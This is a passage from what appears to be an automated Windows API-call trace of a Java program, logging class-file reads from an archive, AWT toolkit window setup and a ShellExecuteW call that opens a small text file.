lpNewFilePointer=0x208e270*=22624964) returned 1 [0135.231] ReadFile (in: hFile=0x134, lpBuffer=0x12e6b280, nNumberOfBytesToRead=0x3b8, lpNumberOfBytesRead=0x208e240, lpOverlapped=0x0 | out: lpBuffer=0x12e6b280*, lpNumberOfBytesRead=0x208e240*=0x3b8, lpOverlapped=0x0) returned 1 [0135.232] wcslen (_String="C:\\Users\\RDhJ0CNFevzX\\m2rKEl2wJZ.txt") returned 0x24 [0135.232] malloc (_Size=0x54) returned 0x12d5a610 [0135.232] wcscpy (in: _Dest=0x12d5a610, _Source="C:\\Users\\RDhJ0CNFevzX\\m2rKEl2wJZ.txt" | out: _Dest="C:\\Users\\RDhJ0CNFevzX\\m2rKEl2wJZ.txt") returned="C:\\Users\\RDhJ0CNFevzX\\m2rKEl2wJZ.txt" [0135.232] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\m2rKEl2wJZ.txt", nBufferLength=0x9, lpBuffer=0x208f658, lpFilePart=0x208f650 | out: lpBuffer="", lpFilePart=0x208f650*=0x0) returned 0x25 [0135.232] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\m2rKEl2wJZ.txt" (normalized: "c:\\users\\rdhj0cnfevzx\\m2rkel2wjz.txt"), fInfoLevelId=0x0, lpFileInformation=0x208f3f0 | out: lpFileInformation=0x208f3f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b314877, ftCreationTime.dwHighDateTime=0x1d80c8a, ftLastAccessTime.dwLowDateTime=0x2b314877, ftLastAccessTime.dwHighDateTime=0x1d80c8a, ftLastWriteTime.dwLowDateTime=0x2b33b605, ftLastWriteTime.dwHighDateTime=0x1d80c8a, nFileSizeHigh=0x0, nFileSizeLow=0x6)) returned 1 [0135.233] free (_Block=0x12d5a610) [0135.234] wcslen (_String="C:\\Users\\RDhJ0CNFevzX\\m2rKEl2wJZ.txt") returned 0x24 [0135.234] malloc (_Size=0x54) returned 0x12d5aaf0 [0135.234] wcscpy (in: _Dest=0x12d5aaf0, _Source="C:\\Users\\RDhJ0CNFevzX\\m2rKEl2wJZ.txt" | out: _Dest="C:\\Users\\RDhJ0CNFevzX\\m2rKEl2wJZ.txt") returned="C:\\Users\\RDhJ0CNFevzX\\m2rKEl2wJZ.txt" [0135.234] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\m2rKEl2wJZ.txt" (normalized: "c:\\users\\rdhj0cnfevzx\\m2rkel2wjz.txt")) returned 0x20 [0135.234] free (_Block=0x12d5aaf0) [0135.237] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x7ffb5f2d0000 [0135.237] GetProcAddress (hModule=0x7ffb5f2d0000, lpProcName="ShellExecuteW") returned 0x7ffb5f41e8c0 [0135.237] ShellExecuteW (hwnd=0x0, lpOperation="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\m2rKEl2wJZ.txt", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0150.393] GetLastError () returned 0x0 [0150.488] strlen (_Str="java/util/IdentityHashMap$KeySet.class") returned 0x26 [0150.488] malloc (_Size=0x48) returned 0x12e5f510 [0150.488] malloc (_Size=0xa0) returned 0x12dab260 [0150.488] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3407e25, lpNewFilePointer=0x208e540, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e540*=54558245) returned 1 [0150.488] ReadFile (in: hFile=0x134, lpBuffer=0x12dab260, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e510, lpOverlapped=0x0 | out: lpBuffer=0x12dab260*, lpNumberOfBytesRead=0x208e510*=0xa0, lpOverlapped=0x0) returned 1 [0150.489] malloc (_Size=0x27) returned 0x12ddaf80 [0150.489] free (_Block=0x12dab260) [0150.490] strlen (_Str="java/util/IdentityHashMap$KeySet.class") returned 0x26 [0150.490] strcpy (in: _Dest=0x208e6c0, _Source="java/util/IdentityHashMap$KeySet.class" | out: _Dest="java/util/IdentityHashMap$KeySet.class") returned="java/util/IdentityHashMap$KeySet.class" [0150.490] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2e4aae0, lpNewFilePointer=0x208e140, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e140*=48540384) returned 1 [0150.490] ReadFile (in: hFile=0x134, lpBuffer=0x208e190, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e110, lpOverlapped=0x0 | out: lpBuffer=0x208e190*, lpNumberOfBytesRead=0x208e110*=0x1e, lpOverlapped=0x0) returned 1 [0150.571] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2e4ab24, lpNewFilePointer=0x208e1a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e1a0*=48540452) returned 1 [0150.571] ReadFile (in: hFile=0x134, lpBuffer=0x12e6b280, nNumberOfBytesToRead=0xa02, lpNumberOfBytesRead=0x208e170, lpOverlapped=0x0 | out: lpBuffer=0x12e6b280*, lpNumberOfBytesRead=0x208e170*=0xa02, lpOverlapped=0x0) returned 1 [0150.672] free (_Block=0x12dda980) [0150.672] free (_Block=0x12e5eed0) [0150.684] strlen (_Str="java/util/IdentityHashMap$KeyIterator.class") returned 0x2b [0150.684] malloc (_Size=0x48) returned 0x12e5ef70 [0150.684] malloc (_Size=0xa0) returned 0x12dabe10 [0150.684] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3407dcc, lpNewFilePointer=0x208e550, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e550*=54558156) returned 1 [0150.685] ReadFile (in: hFile=0x134, lpBuffer=0x12dabe10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e520, lpOverlapped=0x0 | out: lpBuffer=0x12dabe10*, lpNumberOfBytesRead=0x208e520*=0xa0, lpOverlapped=0x0) returned 1 [0150.685] malloc (_Size=0x2c) returned 0x12d60c40 [0150.686] free (_Block=0x12dabe10) [0150.686] strlen (_Str="java/util/IdentityHashMap$KeyIterator.class") returned 0x2b [0150.686] strcpy (in: _Dest=0x208e6d0, _Source="java/util/IdentityHashMap$KeyIterator.class" | out: _Dest="java/util/IdentityHashMap$KeyIterator.class") returned="java/util/IdentityHashMap$KeyIterator.class" [0150.686] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2e4a74b, lpNewFilePointer=0x208e150, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e150*=48539467) returned 1 [0150.686] ReadFile (in: hFile=0x134, lpBuffer=0x208e1a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e120, lpOverlapped=0x0 | out: lpBuffer=0x208e1a0*, lpNumberOfBytesRead=0x208e120*=0x1e, lpOverlapped=0x0) returned 1 [0150.686] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2e4a794, lpNewFilePointer=0x208e1b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e1b0*=48539540) returned 1 [0150.686] ReadFile (in: hFile=0x134, lpBuffer=0x12e6b280, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x208e180, lpOverlapped=0x0 | out: lpBuffer=0x12e6b280*, lpNumberOfBytesRead=0x208e180*=0x34c, lpOverlapped=0x0) returned 1 [0150.687] free (_Block=0x12ddaf80) [0150.687] free (_Block=0x12e5f510) Thread: id = 8 os_tid = 0x1318 Thread: id = 9 os_tid = 0x12ec Thread: id = 10 os_tid = 0x1320 Thread: id = 11 os_tid = 0x1350 Thread: id = 12 os_tid = 0x1348 Thread: id = 13 os_tid = 0x1340 Thread: id = 14 os_tid = 0x1390 Thread: id = 15 os_tid = 0x924 Thread: id = 16 os_tid = 0x310 Thread: id = 19 os_tid = 0xdf8 Thread: id = 20 os_tid = 0xdfc [0136.273] strlen (_Str="java/util/IdentityHashMap$Values.class") returned 0x26 [0136.273] malloc (_Size=0x48) returned 0x12e5f920 [0136.273] malloc (_Size=0xa0) returned 0x12daace0 [0136.273] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x340f2da, lpNewFilePointer=0x13bee4a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x13bee4a0*=54588122) returned 1 [0136.273] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x13bee470, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x13bee470*=0xa0, lpOverlapped=0x0) returned 1 [0136.275] malloc (_Size=0x27) returned 0x12dda980 [0136.275] free (_Block=0x12daace0) [0136.275] strlen (_Str="java/util/IdentityHashMap$Values.class") returned 0x26 [0136.276] strcpy (in: _Dest=0x13bee620, _Source="java/util/IdentityHashMap$Values.class" | out: _Dest="java/util/IdentityHashMap$Values.class") returned="java/util/IdentityHashMap$Values.class" [0136.276] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f62f7e, lpNewFilePointer=0x13bee0a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x13bee0a0*=49688446) returned 1 [0136.276] ReadFile (in: hFile=0x134, lpBuffer=0x13bee0f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x13bee070, lpOverlapped=0x0 | out: lpBuffer=0x13bee0f0*, lpNumberOfBytesRead=0x13bee070*=0x1e, lpOverlapped=0x0) returned 1 [0136.278] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f62fc2, lpNewFilePointer=0x13bee100, dwMoveMethod=0x0 | out: lpNewFilePointer=0x13bee100*=49688514) returned 1 [0136.278] ReadFile (in: hFile=0x134, lpBuffer=0x12e6b280, nNumberOfBytesToRead=0x824, lpNumberOfBytesRead=0x13bee0d0, lpOverlapped=0x0 | out: lpBuffer=0x12e6b280*, lpNumberOfBytesRead=0x13bee0d0*=0x824, lpOverlapped=0x0) returned 1 [0136.279] free (_Block=0x12ddae90) [0136.280] free (_Block=0x12e5ff60) [0136.289] strlen (_Str="java/util/IdentityHashMap$ValueIterator.class") returned 0x2d [0136.289] malloc (_Size=0x48) returned 0x12e600a0 [0136.290] malloc (_Size=0xa0) returned 0x12daace0 [0136.290] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x340f27f, lpNewFilePointer=0x13bee410, dwMoveMethod=0x0 | out: lpNewFilePointer=0x13bee410*=54588031) returned 1 [0136.290] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x13bee3e0, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x13bee3e0*=0xa0, lpOverlapped=0x0) returned 1 [0136.290] malloc (_Size=0x2e) returned 0x12d60b80 [0136.290] free (_Block=0x12daace0) [0136.290] strlen (_Str="java/util/IdentityHashMap$ValueIterator.class") returned 0x2d [0136.290] strcpy (in: _Dest=0x13bee590, _Source="java/util/IdentityHashMap$ValueIterator.class" | out: _Dest="java/util/IdentityHashMap$ValueIterator.class") returned="java/util/IdentityHashMap$ValueIterator.class" [0136.290] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f62c24, lpNewFilePointer=0x13bee010, dwMoveMethod=0x0 | out: lpNewFilePointer=0x13bee010*=49687588) returned 1 [0136.291] ReadFile (in: hFile=0x134, lpBuffer=0x13bee060, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x13bedfe0, lpOverlapped=0x0 | out: lpBuffer=0x13bee060*, lpNumberOfBytesRead=0x13bedfe0*=0x1e, lpOverlapped=0x0) returned 1 [0136.291] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f62c6f, lpNewFilePointer=0x13bee070, dwMoveMethod=0x0 | out: lpNewFilePointer=0x13bee070*=49687663) returned 1 [0136.291] ReadFile (in: hFile=0x134, lpBuffer=0x12e6b280, nNumberOfBytesToRead=0x30f, lpNumberOfBytesRead=0x13bee040, lpOverlapped=0x0 | out: lpBuffer=0x12e6b280*, lpNumberOfBytesRead=0x13bee040*=0x30f, lpOverlapped=0x0) returned 1 [0136.291] free (_Block=0x12dda980) [0136.292] free (_Block=0x12e5f920) [0136.293] strlen (_Str="java/util/IdentityHashMap$IdentityHashMapIterator.class") returned 0x37 [0136.294] malloc (_Size=0x48) returned 0x12e5f600 [0136.294] malloc (_Size=0xa0) returned 0x12dac650 [0136.294] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x340f21a, lpNewFilePointer=0x13bed9d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x13bed9d0*=54587930) returned 1 [0136.294] ReadFile (in: hFile=0x134, lpBuffer=0x12dac650, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x13bed9a0, lpOverlapped=0x0 | out: lpBuffer=0x12dac650*, lpNumberOfBytesRead=0x13bed9a0*=0xa0, lpOverlapped=0x0) returned 1 [0136.294] malloc (_Size=0x38) returned 0x12d61100 [0136.294] free (_Block=0x12dac650) [0136.295] strlen (_Str="java/util/IdentityHashMap$IdentityHashMapIterator.class") returned 0x37 [0136.295] strcpy (in: _Dest=0x13bedb50, _Source="java/util/IdentityHashMap$IdentityHashMapIterator.class" | out: _Dest="java/util/IdentityHashMap$IdentityHashMapIterator.class") returned="java/util/IdentityHashMap$IdentityHashMapIterator.class" [0136.295] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f62406, lpNewFilePointer=0x13bed5d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x13bed5d0*=49685510) returned 1 [0136.295] ReadFile (in: hFile=0x134, lpBuffer=0x13bed620, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x13bed5a0, lpOverlapped=0x0 | out: lpBuffer=0x13bed620*, lpNumberOfBytesRead=0x13bed5a0*=0x1e, lpOverlapped=0x0) returned 1 [0136.295] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f6245b, lpNewFilePointer=0x13bed630, dwMoveMethod=0x0 | out: lpNewFilePointer=0x13bed630*=49685595) returned 1 [0136.295] ReadFile (in: hFile=0x134, lpBuffer=0x12e6b780, nNumberOfBytesToRead=0x7c9, lpNumberOfBytesRead=0x13bed600, lpOverlapped=0x0 | out: lpBuffer=0x12e6b780*, lpNumberOfBytesRead=0x13bed600*=0x7c9, lpOverlapped=0x0) returned 1 [0136.296] free (_Block=0x12d60b80) [0136.296] free (_Block=0x12e600a0) [0136.307] strlen (_Str="sun/awt/AppContext$PostShutdownEventRunnable.class") returned 0x32 [0136.307] malloc (_Size=0x48) returned 0x12e5fab0 [0136.307] malloc (_Size=0xa0) returned 0x12daace0 [0136.307] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33ee4e1, lpNewFilePointer=0x13bee610, dwMoveMethod=0x0 | out: lpNewFilePointer=0x13bee610*=54453473) returned 1 [0136.307] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x13bee5e0, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x13bee5e0*=0xa0, lpOverlapped=0x0) returned 1 [0136.308] malloc (_Size=0x33) returned 0x12d61240 [0136.309] free (_Block=0x12daace0) [0136.309] strlen (_Str="sun/awt/AppContext$PostShutdownEventRunnable.class") returned 0x32 [0136.309] strcpy (in: _Dest=0x13bee790, _Source="sun/awt/AppContext$PostShutdownEventRunnable.class" | out: _Dest="sun/awt/AppContext$PostShutdownEventRunnable.class") returned="sun/awt/AppContext$PostShutdownEventRunnable.class" [0136.309] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2aaf9d2, lpNewFilePointer=0x13bee210, dwMoveMethod=0x0 | out: lpNewFilePointer=0x13bee210*=44759506) returned 1 [0136.309] ReadFile (in: hFile=0x134, lpBuffer=0x13bee260, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x13bee1e0, lpOverlapped=0x0 | out: lpBuffer=0x13bee260*, lpNumberOfBytesRead=0x13bee1e0*=0x1e, lpOverlapped=0x0) returned 1 [0136.312] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2aafa22, lpNewFilePointer=0x13bee270, dwMoveMethod=0x0 | out: lpNewFilePointer=0x13bee270*=44759586) returned 1 [0136.312] ReadFile (in: hFile=0x134, lpBuffer=0x12e6b280, nNumberOfBytesToRead=0x2bd, lpNumberOfBytesRead=0x13bee240, lpOverlapped=0x0 | out: lpBuffer=0x12e6b280*, lpNumberOfBytesRead=0x13bee240*=0x2bd, lpOverlapped=0x0) returned 1 [0136.313] free (_Block=0x12d61100) [0136.314] free (_Block=0x12e5f600) [0136.323] strlen (_Str="sun/awt/AWTAutoShutdown$1.class") returned 0x1f [0136.323] malloc (_Size=0x48) returned 0x12e5eed0 [0136.323] malloc (_Size=0xa0) returned 0x12dab260 [0136.323] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33ee494, lpNewFilePointer=0x13bee560, dwMoveMethod=0x0 | out: lpNewFilePointer=0x13bee560*=54453396) returned 1 [0136.323] ReadFile (in: hFile=0x134, lpBuffer=0x12dab260, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x13bee530, lpOverlapped=0x0 | out: lpBuffer=0x12dab260*, lpNumberOfBytesRead=0x13bee530*=0xa0, lpOverlapped=0x0) returned 1 [0136.323] malloc (_Size=0x20) returned 0x12dda980 [0136.324] free (_Block=0x12dab260) [0136.324] strlen (_Str="sun/awt/AWTAutoShutdown$1.class") returned 0x1f [0136.324] strcpy (in: _Dest=0x13bee6e0, _Source="sun/awt/AWTAutoShutdown$1.class" | out: _Dest="sun/awt/AWTAutoShutdown$1.class") returned="sun/awt/AWTAutoShutdown$1.class" [0136.324] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2aaf86b, lpNewFilePointer=0x13bee160, dwMoveMethod=0x0 | out: lpNewFilePointer=0x13bee160*=44759147) returned 1 [0136.324] ReadFile (in: hFile=0x134, lpBuffer=0x13bee1b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x13bee130, lpOverlapped=0x0 | out: lpBuffer=0x13bee1b0*, lpNumberOfBytesRead=0x13bee130*=0x1e, lpOverlapped=0x0) returned 1 [0136.324] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2aaf8a8, lpNewFilePointer=0x13bee1c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x13bee1c0*=44759208) returned 1 [0136.324] ReadFile (in: hFile=0x134, lpBuffer=0x1224f2e0, nNumberOfBytesToRead=0x12a, lpNumberOfBytesRead=0x13bee190, lpOverlapped=0x0 | out: lpBuffer=0x1224f2e0*, lpNumberOfBytesRead=0x13bee190*=0x12a, lpOverlapped=0x0) returned 1 [0136.324] free (_Block=0x12d61240) [0136.325] free (_Block=0x12e5fab0) Thread: id = 22 os_tid = 0xe04 [0132.395] GetCurrentThreadId () returned 0xe04 [0132.395] __dllonexit () returned 0x722ad1cc8000000 [0132.396] LoadLibraryA (lpLibFileName="COMCTL32.dll") returned 0x7ffb557f0000 [0132.396] GetProcAddress (hModule=0x7ffb557f0000, lpProcName=0x6f4008d4) returned 0x7ffb558504b0 [0132.396] InitCommonControlsEx (picce=0x13cef5b0) returned 1 [0132.402] GetProcAddress (hModule=0x7ffb60b10000, lpProcName="LoadIconW") returned 0x7ffb60b17720 [0132.403] LoadIconW (hInstance=0x6f2d0000, lpIconName="AWT_ICON") returned 0x4b0377 [0132.408] GetProcAddress (hModule=0x7ffb60b10000, lpProcName="RegisterClassW") returned 0x7ffb60b1a6a0 [0132.408] RegisterClassW (lpWndClass=0x13cef550) returned 0xc15a [0132.409] ?_set_new_mode@@YAHH@Z () returned 0x0 [0132.409] ?_set_new_handler@@YAP6AH_K@ZP6AH0@Z@Z () returned 0x0 [0132.409] GetProcAddress (hModule=0x7ffb60b10000, lpProcName="GetDC") returned 0x7ffb60b41fe0 [0132.409] GetDC (hWnd=0x0) returned 0xa0100d0 [0132.409] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x7ffb61690000 [0132.410] GetProcAddress (hModule=0x7ffb61690000, lpProcName="GetDeviceCaps") returned 0x7ffb616b2be0 [0132.410] GetDeviceCaps (hdc=0xa0100d0, index=14) returned 1 [0132.410] GetDeviceCaps (hdc=0xa0100d0, index=12) returned 32 [0132.410] GetProcAddress (hModule=0x7ffb60b10000, lpProcName="ReleaseDC") returned 0x7ffb60b19c50 [0132.410] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0132.411] GetCurrentThreadId () returned 0xe04 [0132.411] GetProcAddress (hModule=0x7ffb60b10000, lpProcName="CreateWindowExW") returned 0x7ffb60b1b4e0 [0132.411] CreateWindowExW (dwExStyle=0x0, lpClassName="SunAwtToolkit", lpWindowName="theAwtToolkitWindow", dwStyle=0x8000000, X=-1, Y=-1, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x6f2d0000, lpParam=0x0) returned 0xb0220 [0134.372] GetCurrentThreadId () returned 0xe04 [0134.373] GetProcAddress (hModule=0x7ffb60b10000, lpProcName="DefWindowProcW") returned 0x7ffb61cf4a40 [0134.373] NtdllDefWindowProc_W (hWnd=0xb0220, Msg=0x24, wParam=0x0, lParam=0x13ceefe0) returned 0x0 [0134.374] GetCurrentThreadId () returned 0xe04 [0134.374] NtdllDefWindowProc_W (hWnd=0xb0220, Msg=0x81, wParam=0x0, lParam=0x13ceef90) returned 0x1 [0134.383] GetCurrentThreadId () returned 0xe04 [0134.383] NtdllDefWindowProc_W (hWnd=0xb0220, Msg=0x83, wParam=0x0, lParam=0x13cef000) returned 0x0 [0134.394] GetCurrentThreadId () returned 0xe04 [0134.394] NtdllDefWindowProc_W (hWnd=0xb0220, Msg=0x1, wParam=0x0, lParam=0x13ceef50) returned 0x0 [0134.395] GetProcAddress (hModule=0x7ffb60b10000, lpProcName="SetWindowsHookExW") returned 0x7ffb60b35dd0 [0134.395] SetWindowsHookExW (idHook=3, lpfn=0x6f39d480, hmod=0x0, dwThreadId=0xe04) returned 0x60207 [0134.395] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x7ffb612e0000 [0134.402] GetProcAddress (hModule=0x7ffb612e0000, lpProcName="OleInitialize") returned 0x7ffb612ea5a0 [0134.403] OleInitialize (pvReserved=0x0) returned 0x0 [0134.467] strlen (_Str="java/lang/ApplicationShutdownHooks.class") returned 0x28 [0134.467] malloc (_Size=0x48) returned 0x12e60140 [0134.467] malloc (_Size=0xa0) returned 0x12dabd60 [0134.467] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341008c, lpNewFilePointer=0x13ced650, dwMoveMethod=0x0 | out: lpNewFilePointer=0x13ced650*=54591628) returned 1 [0134.467] ReadFile (in: hFile=0x134, lpBuffer=0x12dabd60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x13ced620, lpOverlapped=0x0 | out: lpBuffer=0x12dabd60*, lpNumberOfBytesRead=0x13ced620*=0xa0, lpOverlapped=0x0) returned 1 [0134.467] malloc (_Size=0x29) returned 0x12d60cc0 [0134.468] free (_Block=0x12dabd60) [0134.468] strlen (_Str="java/lang/ApplicationShutdownHooks.class") returned 0x28 [0134.468] strcpy (in: _Dest=0x13ced7d0, _Source="java/lang/ApplicationShutdownHooks.class" | out: _Dest="java/lang/ApplicationShutdownHooks.class") returned="java/lang/ApplicationShutdownHooks.class" [0134.468] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f7fcaf, lpNewFilePointer=0x13ced250, dwMoveMethod=0x0 | out: lpNewFilePointer=0x13ced250*=49806511) returned 1 [0134.468] ReadFile (in: hFile=0x134, lpBuffer=0x13ced2a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x13ced220, lpOverlapped=0x0 | out: lpBuffer=0x13ced2a0*, lpNumberOfBytesRead=0x13ced220*=0x1e, lpOverlapped=0x0) returned 1 [0134.470] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f7fcf5, lpNewFilePointer=0x13ced2b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x13ced2b0*=49806581) returned 1 [0134.470] ReadFile (in: hFile=0x134, lpBuffer=0x12e6b280, nNumberOfBytesToRead=0x70c, lpNumberOfBytesRead=0x13ced280, lpOverlapped=0x0 | out: lpBuffer=0x12e6b280*, lpNumberOfBytesRead=0x13ced280*=0x70c, lpOverlapped=0x0) returned 1 [0134.470] free (_Block=0x12ddabf0) [0134.471] free (_Block=0x12e5f830) [0134.476] strlen (_Str="java/lang/ApplicationShutdownHooks$1.class") returned 0x2a [0134.476] malloc (_Size=0x48) returned 0x12e5ee30 [0134.476] malloc (_Size=0xa0) returned 0x12dab9f0 [0134.476] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3410034, lpNewFilePointer=0x13cecfb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x13cecfb0*=54591540) returned 1 [0134.476] ReadFile (in: hFile=0x134, lpBuffer=0x12dab9f0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x13cecf80, lpOverlapped=0x0 | out: lpBuffer=0x12dab9f0*, lpNumberOfBytesRead=0x13cecf80*=0xa0, lpOverlapped=0x0) returned 1 [0134.476] malloc (_Size=0x2b) returned 0x12d60c00 [0134.477] free (_Block=0x12dab9f0) [0134.477] strlen (_Str="java/lang/ApplicationShutdownHooks$1.class") returned 0x2a [0134.477] strcpy (in: _Dest=0x13ced130, _Source="java/lang/ApplicationShutdownHooks$1.class" | out: _Dest="java/lang/ApplicationShutdownHooks$1.class") returned="java/lang/ApplicationShutdownHooks$1.class" [0134.477] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f7fb1a, lpNewFilePointer=0x13cecbb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x13cecbb0*=49806106) returned 1 [0134.477] ReadFile (in: hFile=0x134, lpBuffer=0x13cecc00, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x13cecb80, lpOverlapped=0x0 | out: lpBuffer=0x13cecc00*, lpNumberOfBytesRead=0x13cecb80*=0x1e, lpOverlapped=0x0) returned 1 [0134.477] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f7fb62, lpNewFilePointer=0x13cecc10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x13cecc10*=49806178) returned 1 [0134.477] ReadFile (in: hFile=0x134, lpBuffer=0x1224eb30, nNumberOfBytesToRead=0x14d, lpNumberOfBytesRead=0x13cecbe0, lpOverlapped=0x0 | out: lpBuffer=0x1224eb30*, lpNumberOfBytesRead=0x13cecbe0*=0x14d, lpOverlapped=0x0) returned 1 [0134.478] free (_Block=0x12d60cc0) [0134.478] free (_Block=0x12e60140) [0134.484] strlen (_Str="java/lang/Shutdown.class") returned 0x18 [0134.484] malloc (_Size=0x48) returned 0x12e5f830 [0134.484] malloc (_Size=0xa0) returned 0x12daace0 [0134.484] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x340ffee, lpNewFilePointer=0x13cecd00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x13cecd00*=54591470) returned 1 [0134.484] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x13ceccd0, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x13ceccd0*=0xa0, lpOverlapped=0x0) returned 1 [0134.484] malloc (_Size=0x19) returned 0x12ddabf0 [0134.485] free (_Block=0x12daace0) [0134.485] strlen (_Str="java/lang/Shutdown.class") returned 0x18 [0134.485] strcpy (in: _Dest=0x13cece80, _Source="java/lang/Shutdown.class" | out: _Dest="java/lang/Shutdown.class") returned="java/lang/Shutdown.class" [0134.485] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f7f111, lpNewFilePointer=0x13cec900, dwMoveMethod=0x0 | out: lpNewFilePointer=0x13cec900*=49803537) returned 1 [0134.485] ReadFile (in: hFile=0x134, lpBuffer=0x13cec950, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x13cec8d0, lpOverlapped=0x0 | out: lpBuffer=0x13cec950*, lpNumberOfBytesRead=0x13cec8d0*=0x1e, lpOverlapped=0x0) returned 1 [0134.485] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f7f147, lpNewFilePointer=0x13cec960, dwMoveMethod=0x0 | out: lpNewFilePointer=0x13cec960*=49803591) returned 1 [0134.485] ReadFile (in: hFile=0x134, lpBuffer=0x12e6b280, nNumberOfBytesToRead=0x9d3, lpNumberOfBytesRead=0x13cec930, lpOverlapped=0x0 | out: lpBuffer=0x12e6b280*, lpNumberOfBytesRead=0x13cec930*=0x9d3, lpOverlapped=0x0) returned 1 [0134.485] free (_Block=0x12d60c00) [0134.486] free (_Block=0x12e5ee30) [0134.996] strlen (_Str="java/lang/Shutdown$Lock.class") returned 0x1d [0134.996] malloc (_Size=0x48) returned 0x12e5ff60 [0134.996] malloc (_Size=0xa0) returned 0x12dabd60 [0134.996] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x340ffa3, lpNewFilePointer=0x13cec680, dwMoveMethod=0x0 | out: lpNewFilePointer=0x13cec680*=54591395) returned 1 [0134.997] ReadFile (in: hFile=0x134, lpBuffer=0x12dabd60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x13cec650, lpOverlapped=0x0 | out: lpBuffer=0x12dabd60*, lpNumberOfBytesRead=0x13cec650*=0xa0, lpOverlapped=0x0) returned 1 [0134.997] malloc (_Size=0x1e) returned 0x12dda980 [0134.998] free (_Block=0x12dabd60) [0134.998] strlen (_Str="java/lang/Shutdown$Lock.class") returned 0x1d [0134.998] strcpy (in: _Dest=0x13cec800, _Source="java/lang/Shutdown$Lock.class" | out: 